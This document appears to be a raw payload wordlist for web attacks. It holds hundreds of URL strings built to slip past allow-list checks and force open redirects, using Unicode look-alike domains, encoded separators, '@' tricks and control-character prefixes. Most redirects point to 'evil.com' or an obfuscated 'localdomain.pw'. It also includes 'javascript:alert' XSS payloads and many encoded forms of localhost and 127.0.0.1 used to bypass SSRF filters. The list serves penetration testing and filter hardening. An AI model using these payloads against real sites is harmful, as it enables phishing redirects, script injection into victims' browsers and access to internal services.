///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
//https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
//https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
//https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
//www.whitelisteddomain.tld@https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/https://%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/https://%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http:Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https:Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw
\/\/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/\/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//\/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ%00。Pⓦ
https://www.whitelisteddomain.tld/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
〱Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
〵Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
ゝⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/〱Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/〵Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/ゝⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
<>//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
https://:@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@www.whitelisteddomain.tld/
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@www.whitelisteddomain.tld/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld⁺@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld⁺@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://www.whitelisteddomain.tld+&@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@www.whitelisteddomain.tld/
http://www.whitelisteddomain.tld⁺&@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#⁺@www.whitelisteddomain.tld/
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twww.whitelisteddomain.tld/
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@www.whitelisteddomain.tld/
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@www.whitelisteddomain.tld/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld⁺@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld⁺@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//www.whitelisteddomain.tld+&@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@www.whitelisteddomain.tld/
//www.whitelisteddomain.tld⁺&@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#⁺@www.whitelisteddomain.tld/
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twww.whitelisteddomain.tld/
//;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//﹔@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http://;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http://﹔@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%2f%2f.www.whitelisteddomain.tld/
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%5c%5c.www.whitelisteddomain.tld/
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%3F.www.whitelisteddomain.tld/
http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%23.www.whitelisteddomain.tld/
http://www.whitelisteddomain.tld:80%40Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://www.whitelisteddomain.tld%2eⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/https:/%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https:/%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%2f%2fⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%2f%2fⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/http:/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http:/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http://.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///\;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///\﹔@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http://www.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\.www.whitelisteddomain.tld
%01https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
www.whitelisteddomain.tld;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
www.whitelisteddomain.tld﹔@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://www.whitelisteddomain.tld;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://www.whitelisteddomain.tld﹔@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http:%0a%0dⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%0a%0dⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
javascript:alert(document.domain)//://
/#//localdomain.pw
#//localdomain.pw
/#//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
#//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https%3A/localdomain.pw
https%3A/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%2f%2f.www.whitelisteddomain.tld/
https%3A/:@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
https%3A/;@localdomain.pw
https%3A/﹔@localdomain.pw
https%3A/www.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\.www.whitelisteddomain.tld
javascript:%250Aalert(1)
javascript:alert(1)//https://www.whitelisteddomain.tld
°/localdomain.pw
°/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////localdomain。pw
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//localdomain.pw?
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ?
//.@.@localdomain.pw
//.@.@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
javascript:new%20Function`al\ert\`1\``;
%09Jav%09ascript:alert(1)
https://localdomain。pw\ᵗwww.whitelisteddomain.tld
//localdomain。pw\ᵗwww.whitelisteddomain.tld
https://www.whitelisteddomain.tld。₨/
//www.whitelisteddomain.tld。₨/
https://localdomain.pw\udfff@www.whitelisteddomain.tld/
//localdomain.pw\udfff@www.whitelisteddomain.tld/
https://localdomain.pw�@www.whitelisteddomain.tld/
//localdomain.pw�@www.whitelisteddomain.tld/
https://www.whitelisteddomain.tld%40%E2%80%AE@wp.niamodlacol
https://www.whitelisteddomain.tld%40%E2%80%AE@localdomain.pw
https://www.whitelisteddomain.tld%40%E2%80%AE@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://www.whitelisteddomain.tld@%E2%80%AE@wp.niamodlacol
https://www.whitelisteddomain.tld@%E2%80%AE@localdomain.pw
https://www.whitelisteddomain.tld@%E2%80%AE@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://www.whitelisteddomain.tld@/%E2%80%AE@wp.niamodlacol
https://www.whitelisteddomain.tld@/%E2%80%AE@localdomain.pw
https://www.whitelisteddomain.tld@/%E2%80%AE@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://www.whitelisteddomain.tld@'#localdomain.pw
https://www.whitelisteddomain.tld@'#Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
javascript:alert(1)//localdomain.pw/
javascript:alert(1)//www.whitelisteddomain.tld/
Javascript://%E2%80%A9alert(618)
https://www.whitelisteddomain.tld%09.localdomain.pw
www.whitelisteddomain.tld%09.localdomain.pw
https://www.whitelisteddomain.tld%09.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
www.whitelisteddomain.tld%09.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://www.whitelisteddomain.tld%09。Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
www.whitelisteddomain.tld%09。Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://www.whitelisteddomain.tld%252elocaldomain.pw
www.whitelisteddomain.tld%252elocaldomain.pw
https://www.whitelisteddomain.tld%252eⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
www.whitelisteddomain.tld%252eⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
%0A/localdomain.pw
%0A/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%2F/localdomain.pw
/%2F/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
%252F@localdomain.pw
%252F@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//localdomain.pw\@.www.whitelisteddomain.tld
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@.www.whitelisteddomain.tld
//localdomain.pw\\@.www.whitelisteddomain.tld
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\\@.www.whitelisteddomain.tld
//localdomain.pw%FF@www.whitelisteddomain.tld
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%FF@www.whitelisteddomain.tld
//localdomain.pw%23@www.whitelisteddomain.tld
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%23@www.whitelisteddomain.tld
//www.whitelisteddomain.tld/../..%20.localdomain.pw
//www.whitelisteddomain.tld/../..%20.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://www.whitelisteddomain.tld
https://www.whitelisteddomain.tld;.evil.com/
https://www.whitelisteddomain.tld:%40evil.com/
https://www.whitelisteddomain.tld:443:\%40%40evil.com/
https://www.whitelisteddomain.tld:443\%40evil.com/
https://www.whitelisteddomain.tld:443#\%40evil.com/
https://www.whitelisteddomain.tld:anything%40evil.com/
https://www.whitelisteddomain.tld?%40evil.com/
https://www.whitelisteddomain.tld.%5F.evil.com/
https://www.whitelisteddomain.tld.-.evil.com/
https://www.whitelisteddomain.tld.%2C.evil.com/
https://www.whitelisteddomain.tld.;.evil.com/
https://www.whitelisteddomain.tld.%21.evil.com/
https://www.whitelisteddomain.tld.%27.evil.com/
https://www.whitelisteddomain.tld.".evil.com/
https://www.whitelisteddomain.tld.%28.evil.com/
https://www.whitelisteddomain.tld.%29.evil.com/
https://www.whitelisteddomain.tld.{.evil.com/
https://www.whitelisteddomain.tld.}.evil.com/
https://www.whitelisteddomain.tld.*.evil.com/
https://www.whitelisteddomain.tld.&.evil.com/
https://www.whitelisteddomain.tld.`.evil.com/
https://www.whitelisteddomain.tld.+.evil.com/
https://www.whitelisteddomain.tld.evil.com/
https://www.whitelisteddomain.tld.=.evil.com/
https://www.whitelisteddomain.tld.%7E.evil.com/
https://www.whitelisteddomain.tld.%24.evil.com/
https://www.whitelisteddomain.tld%5B%40evil.com/
https://www.whitelisteddomain.tld%40evil.com/
https://www.whitelisteddomain.tld\;%40evil.com/
https://www.whitelisteddomain.tld&anything%40evil.com/
https://www.whitelisteddomain.tld#evil.com/
https://www.whitelisteddomain.tld%2523evil.com/
https://www.whitelisteddomain.tldevil.com/
https://evil.com%09www.whitelisteddomain.tld/
https://evil.com%0Awww.whitelisteddomain.tld/
https://evil.com%0D%0Awww.whitelisteddomain.tld/
https://evil.com%0Dwww.whitelisteddomain.tld/
https://evil.com%E2%80%A8www.whitelisteddomain.tld/
https://evil.com%E2%80%A9www.whitelisteddomain.tld/
https://evil.com
https://evil.com
https://evil.com
https://evil.com;https://www.whitelisteddomain.tld/
https://evil.com:\%40%40www.whitelisteddomain.tld/
0://evil.com:80;http://www.whitelisteddomain.tld:80/
https://evil.com?www.whitelisteddomain.tld/
https://evil.com../
http://evil.com.www.whitelisteddomain.tld/
https://evil.com.www.whitelisteddomain.tld/
https://evil.com%EF%BC%8Ewww.whitelisteddomain.tld/
https://evil.com%40%40www.whitelisteddomain.tld/
https://evil.com%40www.whitelisteddomain.tld/
https://evil.com/?d=www.whitelisteddomain.tld/
https://evil.com/.www.whitelisteddomain.tld/
https://evil.com///www.whitelisteddomain.tld/
https://evil.com/www.whitelisteddomain.tld/
https://evil.com\.www.whitelisteddomain.tld/
https://evil.com\%40%40www.whitelisteddomain.tld/
https://evil.com\www.whitelisteddomain.tld/
https://evil.com\anything%40www.whitelisteddomain.tld/
https://evil.com%EF%BC%86www.whitelisteddomain.tld/
https://evil.com%EF%B9%A0www.whitelisteddomain.tld/
https://evil.com#%40www.whitelisteddomain.tld/
https://evil.com#\%40www.whitelisteddomain.tld/
https://evil.com#www.whitelisteddomain.tld/
https://evil.com%250d%250a%40www.whitelisteddomain.tld/
https://evil.com%2523%40www.whitelisteddomain.tld/
https://evil.com%252e%40www.whitelisteddomain.tld/
https://evil.com%252f%40www.whitelisteddomain.tld/
https://evil.com%253a443.www.whitelisteddomain.tld/
https://evil.com%25ffwww.whitelisteddomain.tld/
https://evil.com+%40www.whitelisteddomain.tld/
https://evil.com+&%40www.whitelisteddomain.tld/
https://evil.com%00www.whitelisteddomain.tld/
http://anythingwww.whitelisteddomain.tld/
https://anythingwww.whitelisteddomain.tld/
https://foo%40evil.com
https://foo%40evil.com:443%40www.whitelisteddomain.tld/
http://localhost.evil.com/
https://localhost.evil.com/
http://swww.whitelisteddomain.tld/
https://%09evil.com/
https://%0Aevil.com/
%0D%0A//evil.com
%0D%0A\\evil.com
%40evil.com
http:%40evil.com
https:%40evil.com
///evil.com
//evil.com
/\evil.com
/\/evil.com
/
/evil.com
///evil.com
/	/evil.com
\%09\evil.com
\%0A\evil.com
\/evil.com
http:\\evil.com\
#evil.com
http:evil.com
https:evil.com
%00http://evil.com
%01http://evil.com
%02http://evil.com
%03http://evil.com
%04http://evil.com
%05http://evil.com
%06http://evil.com
%07http://evil.com
%08http://evil.com
%09http://evil.com
%0Ahttp://evil.com
%0Bhttp://evil.com
%0Chttp://evil.com
%0Dhttp://evil.com
%0Ehttp://evil.com
%0Fhttp://evil.com
%10http://evil.com
%11http://evil.com
%12http://evil.com
%13http://evil.com
%14http://evil.com
%15http://evil.com
%16http://evil.com
%17http://evil.com
%18http://evil.com
%19http://evil.com
%1Ahttp://evil.com
%1Bhttp://evil.com
%1Chttp://evil.com
%1Dhttp://evil.com
%1Ehttp://evil.com
%1Fhttp://evil.com
http://evil.com
h%09ttp://evil.com
h%0Attp://evil.com
h%0Dttp://evil.com
http%09://evil.com
http%0A://evil.com
http%0D://evil.com
%09http%09://evil.com
%0Ahttp%0A://evil.com
%0Dhttp%0D://evil.com
http:/\evil.com
http:/\\evil.com
http:\\evil.com
http:\evil.com
http:/evil.com
http:/0/evil.com
https://%E2%80%8Bevil.com/
https://%E2%81%A0evil.com/
https://%C2%ADevil.com/
https://%5B::%5D/
https://%5B::1%5D/
https://%5B::ffff:0.0.0.0%5D/
https://%5B::ffff:0000:0000%5D/
https://%5B::ffff:7f00:1%5D/
https://%5B::%EF%AC%80%EF%AC%80:7f00:1%5D/
https://%5B0:0:0:0:0:ffff:127.0.0.1%5D/
https://%5B0:0:0:0:0:ffff:1%E3%89%97.0.0.1%5D/
https://%5B0:0:0:0:0:ffff:%E2%91%AB7.0.0.1%5D/
https://%5B0:0:0:0:0:%EF%AC%80%EF%AC%80:127.0.0.1%5D/
https://%5B0000::1%5D/
https://%5B0000:0000:0000:0000:0000:0000:0000:0000%5D/
https://%5B0000:0000:0000:0000:0000:0000:0000:0001%5D/
https://%400/
https://\l\o\c\a\l\h\o\s\t/
https://www.whitelisteddomain.tld.local/
https://www.whitelisteddomain.tld.localhost/
https://0/
https://0.0.0.0/
https://0000.0000.0000.0000/
https://00000177.00000000.00000000.00000001/
https://0177.0000.0000.0001/
https://017700000001/
https://0%E2%91%B0700000001/
https://0x00000000/
https://0x100000000/
https://0x17f000001/
https://0x17f000002/
https://0x7F.0.0000.00000001/
https://0x7F.0.0000.0001/
https://0x7f.0x00.0x00.0x01/
https://0x7f.0x00.0x00.0x02/
https://0x7F.1/
https://0x7f000001/
https://0x7f000002/
https://127.0.0.1/
https://1%E3%89%97.0.0.1/
https://%E2%91%AB7.0.0.1/
https://127.0.0.2/
https://1%E3%89%97.0.0.2/
https://%E2%91%AB7.0.0.2/
https://127.000000000000000.1/
https://127.1/
https://2130706433/
https://21307064%E3%89%9D/
https://2130706%E3%8A%B83/
https://21%E3%89%9A706433/
https://2%E2%91%AC0706433/
https://%E3%89%9130706433/
https://%E3%89%91%E3%89%9A%E2%91%A6%E2%93%AA%E2%91%A5%E2%91%A3%E3%89%9D/
https://45080379393/
https://localhost/
https://%C2%ADlocalhost/
https://%CD%8Flocalhost/
https://%E1%A0%8Blocalhost/
